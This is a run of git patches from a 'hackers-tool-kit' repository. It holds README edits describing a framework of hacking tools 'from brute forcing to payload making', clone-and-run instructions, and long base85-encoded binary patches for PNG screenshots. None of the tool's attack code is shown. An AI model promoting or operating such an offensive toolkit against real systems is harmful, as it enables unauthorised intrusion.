zeu&D5vEN7ZIGbr@UE+0eoH29mlS4BR?Dg1ZrzAGS^qA}@es>dydAR<6J@WtRnEzcT z`3K8@;vAz6*hO{7u1RX8Ux-T>jN5)+L&eIV1lK53lqxoRFYP}(0UiKxHm?+H3!WMi z*H9`_uhvYKybGW6Ba%H!yt_h|9K}Q64S)=AeXmgb{{<0(Acfw2^{Gz-T&;MP=u{_i&-{r4T~hXeoH z2=JdOP&K{nFzizcP?5&eNuG&L&)H8+V3XbzU7>#IoDb6kRY_Nh4Hx`U7YI;vhyN+) z|0h8IKeneI6y(PV{=abB|5SGWPzVR%_u<`1CVg+4&WXoepg03`&Gt*ibM{v8~liiLF&n%aPA}psEQ-wghJEtEXK>t-m~BS6Cc)#k5~?K1$fip_&0n zx4O!<790?ucsGwN(Anke*Q?MEV2|sXXspf$nFaQKZQmnqdkvN8J*^Qhk3ylu#l;s( zTfA($mcS0PO5oz4z|z*=A9D%p4qSE?JnepNi0CF{*7zmQv|+Iez1amyCTH#_pqyr` zE;W9n_vFwpj}HpDJo~Iw__R>z#bgiN7TT;)$g9^q2Z#pYVPRo>ci;aWzur$+tW)t8 zB*Zu>2bq9L(ono+G+P zA`$rjy_LR9rcBuQZwcZy*K{4I)pIJNC32`NIAKrlq91*8)6AL@3bcvA!Nr`JZHSZh zKgnM|8VHZWt@`7>fCsKS)SNb_d$5SdV|33MV?%s#PUFfp1>-sX z>5#)V9L+6z7Ukf*9yK>kVqLo*AVq$p+0}hu=j7QB^H#xj)v3kBu3e)60Rb;r;ojGR zhrm|Y;MtpvV0T}Ugwf!!5YY{@X0NVy`hj*>%1!O9&*)M?F zv5AO&uz`4_sGWgUww|`zOHQ(y{pvV^8G$r;ZEUX=1wX$<{>^>$at{S!myHU zXuB^X-)ua8&ooFnK~h(~Ore;89oJCR5LK%g>|YI@u9^5%GFDe4$+5v#suJHJDVAEfASE`t{IsXFJvMcA z+hA)LqmVcIbR3n*+M^kKOexvgpf7gTrUI2oliv|I*xUQGl!udn=R&nNIyZiX4iOz4 z?fMi`2cz8Ohn`y!D~eld0?%Qsdv@%Cx`sx6EjBJLPS2&sRBS3K*r5}FJZwp?VHO+G zI;!K)M@EO_crPDb8{RIp&3S7X6th_=xAu86ON^o?ngdy*4>G#9w-;!s($I&hoo^%SXTF7u4Es6BRlGSRVXqG`=q zRyJ9;C%>{)u5;o;21qtRx#BZ;vg*pJC)iFrXvVp$eLyR7_ReBaN=o^|etUOW4byG5 zt Date: Fri, 15 Feb 2019 10:24:20 +0100 Subject: [PATCH 005/214] Update README.md --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index 125f169..9eef0d3 100644 --- a/README.md +++ b/README.md @@ -12,3 +12,5 @@ my instagram @unkn0wn_bali * `python install.py` # Screenshot + +![](screenshot.png) From 9940d99798d315c918754b27782c0cfe3f385b6b Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Fri, 15 Feb 2019 10:28:20 +0100 Subject: [PATCH 006/214] Update README.md --- README.md | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 9eef0d3..f83ed38 100644 --- a/README.md +++ b/README.md @@ -3,6 +3,8 @@ Its a framework filled with alot of options and hacking tools you use directly i from brute forcing to payload making im still adding more stuff to see updates check on my instagram @unkn0wn_bali +![](screenshot.png) + # install * `git clone https://github.com/unkn0wnh4ckr/hackers-tool-kit` @@ -11,6 +13,8 @@ my instagram @unkn0wn_bali * `python install.py` -# Screenshot +# Run -![](screenshot.png) +* `cd hackers-tool-kit` + +* `python htk.py` From 53debb04795c14d5c1a34af23262acd903efcfc1 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Fri, 15 Feb 2019 10:31:04 +0100 Subject: [PATCH 007/214] Update README.md --- README.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/README.md b/README.md index f83ed38..2472207 100644 --- a/README.md +++ b/README.md @@ -5,6 +5,9 @@ my instagram @unkn0wn_bali ![](screenshot.png) +![](sc reenshot2.png) + +![](s creenshot3.png) # install * `git clone https://github.com/unkn0wnh4ckr/hackers-tool-kit` From 019fe3146fb23fe511c91b33bb8ec39287d30f03 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Fri, 15 Feb 2019 10:31:38 +0100 Subject: [PATCH 008/214] Add files via upload --- screenshot2.png | Bin 0 -> 93365 bytes screenshot3.png | Bin 0 -> 98956 bytes 2 files changed, 0 insertions(+), 0 deletions(-) create mode 100644 screenshot2.png create mode 100644 screenshot3.png diff --git a/screenshot2.png b/screenshot2.png new file mode 100644 index 0000000000000000000000000000000000000000..d1114bc0cc4822c6155d411ffa920838bfebb1dd GIT binary patch literal 93365 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 